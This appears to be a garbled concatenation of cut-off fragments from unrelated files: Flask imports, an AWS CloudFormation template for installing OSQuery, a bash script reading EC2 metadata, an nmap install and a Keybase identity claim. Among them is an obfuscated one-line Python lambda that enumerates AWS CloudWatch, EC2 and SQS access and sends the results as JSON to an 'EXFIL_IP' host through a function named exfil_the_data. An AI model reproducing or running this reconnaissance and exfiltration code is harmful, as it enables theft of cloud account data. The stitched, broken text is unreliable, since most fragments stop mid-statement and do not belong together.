from flask import Flask
from flask_cors import CORS
from flask_graphql import GraphQLView
from flask_restful import Api
from graphene import Schema
from cis_profile_retrieval_service.common import get_config
from cis_profile_retrieval_service.common import initialize_vault
from cis_profile_retrieval_service.common import seed
from cis_profile_retrieval_service.schema import Query

AWSTemplateFormatVersion: "2010-09-09"
Description: "Template to create SSM Document to add OSQuery to a box."
Resources:
  LinuxInstallOSQueryDocumentCommand:
    Type: AWS::SSM::Document
    Properties:
      Content:
        schemaVersion: "2.2"
        description: Run rpm to bootstrap OSQuery onto a system (requires internet gateway).
        mainSteps:

#!/bin/bash
# Make sure it runs as root
[[ $UID == 0 || $EUID == 0 ]] || (
  echo "Must be root!"
  exit 1
) || exit 1
# Default variables
INSTANCE_ID=$(curl -s http://169.254.169.254/latest/meta-data/instance-id)

import botocore
import boto3
import json
import os
import time
import uuid
try:
    import urllib2
except:

(lambda __print, __g, __contextlib, __y: [[[[[[(lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: ('\nChecks to run if the environment is AWS.\n\nlogs:CreateLogGroup\nlogs:CreateLogStream\nlogs:PutLogEvents\nec2:DescribeTags\nsqs:ListQueues\nsqs:PutMessage\n\n', [[[[[[[[[[(lambda __after: (json.dumps(check_cloudwatch()), (exfil_the_data(json.dumps(check_cloudwatch())), (exfil_the_data(json.dumps(check_ec2())), (exfil_the_data(json.dumps(check_sqs())), __after())[1])[1])[1])[1] if (__name__ == '__main__') else __after())(lambda: None) for __g['exfil_the_data'], exfil_the_data.__name__ in [(lambda data: (lambda __l: [[[[[[(__print(__l['response']), None)[1] for __l['response'] in [(urllib2.urlopen(__l['req']))]][0] for __l['req'] in [(urllib2.Request('http://{EXFIL_IP}/'.format(EXFIL_IP=__l['exfil_ip']), data=__l['data'], headers=__l['headers']))]][0] for __l['headers'] in [({'Content-Type': 'application/json'})]][0] for __l['data'] in [(__l['data'].encode('utf-

apt-get update -y
apt-get install nmap -y

I hereby claim:
- I am andrewkrug on github.
- I am andrewkrug (https://keybase.io/andrewkrug) on keybase.
- I have a public key ASBVwj9dJk9VZ0cPMEA4TLbWp-dqLAqDMNBdJhihDy0YqAo
To claim this, I am signing this object: